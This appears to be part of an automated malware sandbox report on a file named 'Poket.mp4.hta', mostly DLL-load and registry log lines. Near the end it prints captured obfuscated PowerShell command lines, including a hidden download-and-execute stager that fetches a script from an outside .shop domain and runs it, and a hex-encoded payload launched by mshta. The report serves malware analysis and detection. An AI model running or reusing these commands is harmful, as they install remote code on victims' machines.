Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Poket.mp4.hta

Static file information: File size 1645681 > 1048576

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000004.00000002.2549625066.0000000008060000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000004.00000002.2549625066.0000000008060000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.powershell.exe.8000000.1.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 4.2.powershell.exe.8000000.1.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 4.2.powershell.exe.8000000.1.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 4.2.powershell.exe.8000000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 4.2.powershell.exe.8000000.1.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 4.2.powershell.exe.8060000.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 4.2.powershell.exe.8060000.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 4.2.powershell.exe.8060000.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 4.2.powershell.exe.a6d0d60.4.raw.unpack, Tqkgthnr.cs	.Net Code: Szplwz System.AppDomain.Load(byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($z));$BytesTrINg = $Enc.$3S9fboqEW6s5lzzrbxISnQAS8vfZfX1lKoB0Ljaei3YziUwKv3ke81MgYgaiamrUfTVWZ4Imyl6PYMRCDuizL5OqzlUjSfe60lWDsf9oTxE2o45BuYjIqKoGHrCzHVwRljlxlkfY1UDUJjuio7lawqoA087tMV

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D	Jump to behavior
